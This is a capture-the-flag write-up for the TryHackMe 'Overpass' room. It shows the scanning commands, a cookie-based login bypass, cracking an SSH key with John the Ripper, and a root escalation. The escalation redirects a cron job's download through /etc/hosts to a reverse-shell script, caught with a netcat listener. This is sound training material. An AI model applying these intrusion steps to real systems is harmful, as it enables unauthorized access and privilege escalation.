Overpass | TryHackMe
1. Hack the machine and get the flag in user.txt
Let’s start the target machine by clicking the green “Start Machine” button at the top of the task. Next, we need to connect to the TryHackMe network. I’m using a Kali virtual machine so I’ll use OpenVPN to connect.
Starting the target machine
We’ll do an nmap scan to check for open ports and services. We want the results to list the services and be very verbose so we’ll use the sV and vv flags. The following will be the full command we use.
nmap -sV -vv 10.10.95.150From the scan we see that two ports are open: SSH and HTTP.
Results from the nmap scan
Let’s take a look at the website to see if we can find anything.
Homepage of the website
The homepage lists some information about a password manager we can download. Looking at the source code of the homepage, there is a note about what is being talked about.
Comment in the homepage source code
I looked at the rest of the site and downloaded the source code of the password manager to look at. I didn’t find anything interesting in either places. Let’s do a Gobuster scan using the common.txt wordlist to look for hidden directories. The following will be the command we use.
gobuster dir -u http://10.10.95.150 -w /usr/share/wordlists/dirb/common.txtGobuster finds a small list of directories.
Results of the Gobuster scan
The /css and /img pages don’t have anything interesting in them. The /admin page shows us a login form for the website.
Admin login page
Inspecting the debugger on the admin page, we can see there is some JavaScript being used.
JavaScript being used
If we look at the login.js we can see some code about setting a cookie.
Script to set a cookie
The cookie is called “SessionToken”, we can add it in the console or in the storage menu. In the storage menu, we can press the “+” button on the right of the screen and name it “SessionToken”. The value of the cookie is not checked, once we refresh the page, we have admin access.
Getting admin access.
To add the cookie from console, we can copy the “Cookies.set” code and change the “statusOrCookie” to anything. We can use the following code in the console to create the cookie.
Cookies.set(“SessionToken”,"")We can then hit enter and refresh the page and we get admin access.
Getting admin access from console
The page has a message to someone named James, with an RSA key. Let’s copy and paste this key into a file called “rsakey” on our machine. The key is encrypted, but we can use ssh2john to get the file into a format that we can use with john. We’ll save it to a file called “rsajohn” by using the following command.
ssh2john rsakey > rsajohnWe now have a file that we can crack with John. Let’s use the rockyou.txt wordlist to crack it with the following command.
john --wordlist=/usr/share/wordlists/rockyou.txt rsajohnWithin a few seconds we get a hit on the password.
Getting the password for the rsakey
Before we can SSH into the target as James, we need to change the permissions of our rsakey file. We can use the following command to do that.
chmod 600 rsakeyWe can now SSH into the target using the following command to specify that we’re using the rsakey.
ssh james@10.10.95.150 -i rsakeyNow that we’re logged in as James, let’s list the files to get the user flag.
Getting the user flag
Now we can start trying to escalate our privileges to root.
2. Escalate your privileges and get the flag in root.txt
We’ll start with what I think is the easiest way to escalate, listing our sudo permissions.
Trying to list our sudo permissions
Listing our permisisons requires a password, which we don’t have. Let’s try using find to list our SUID executables.
LIsting our SUID executables
None of these are interesting for us. Let’s check the crontab on the machine.
Listing the crontab
Every minute a curl request is made to something called buildscript.sh. It makes the request to overpass.thm, we may be able to change the /etc/hosts file to our machine so that the target downloads a malicious buildscript.sh from us.
If we use nano we can edit the file to our machine’s IP.
Changing overpass.thm to our IP
Now the system will check our machine for /downloads/src/buildscript.sh which means we need to make that directory for it to access. I created the directories using the GUI. We can then use nano to create the file in that directory. The code we’ll use for the exploit will be the Bash reverse shell from PentestMonkey’s Reverse Shell Cheat Sheet. We’ll replace the IP and port with our own.
Adding the exploit to our directory
Next, we’ll have to start a webserver for the target machine to connect to. We can do this with the http.server python module using the following command.
python3 -m http.server 80The target machine will now be making requests to our machine. When it executes the code, we need a way to catch the shell that is being executed. We’ll use the following command to create a netcat listener
rlwrap nc -lvnp 4444For an explainer of the flags used with the command, click here. We can see the request made on our server.
GET request from the target
After the request, we see our netcat listener catch the shell.
Catching the shell
With the shell, we can list our files and read the root flag.
Getting the root flag
We’ve completed the room! We’ve gone from an nmap scan to root using a cookie authentication bypass, John the Ripper, crontabs, and hosts editing. I hope this writeup could be helpful in completing the room! If you are still struggling please leave a comment or message me on Twitter and I will try my best to assist!
Lessons Learned:
- Cookies can be used to bypass login forms
- Scheduled tasks can be exploited
Things I struggled with:
It took me a long time to find the cookie bypass on the website. For some reason I never checked the debugger menu so I was trying different ways to get the correct cookie on the browser. In the bash code I used for the reverse shell, I had a typo which kept returning an error which I spent about 15 minutes debugging.
Conclusion:
This room is good! I liked that it used a vulnerability that is uncommon in most rooms. Once you figure out the scheduled task vulnerability, you can kind of do whatever you want to get root which I think is fun. I could come back to this room and use different code to get root which is cool. I would recommend this to someone who has completed the OWASP Top 10 room and some CTF rooms and wants a challenge.
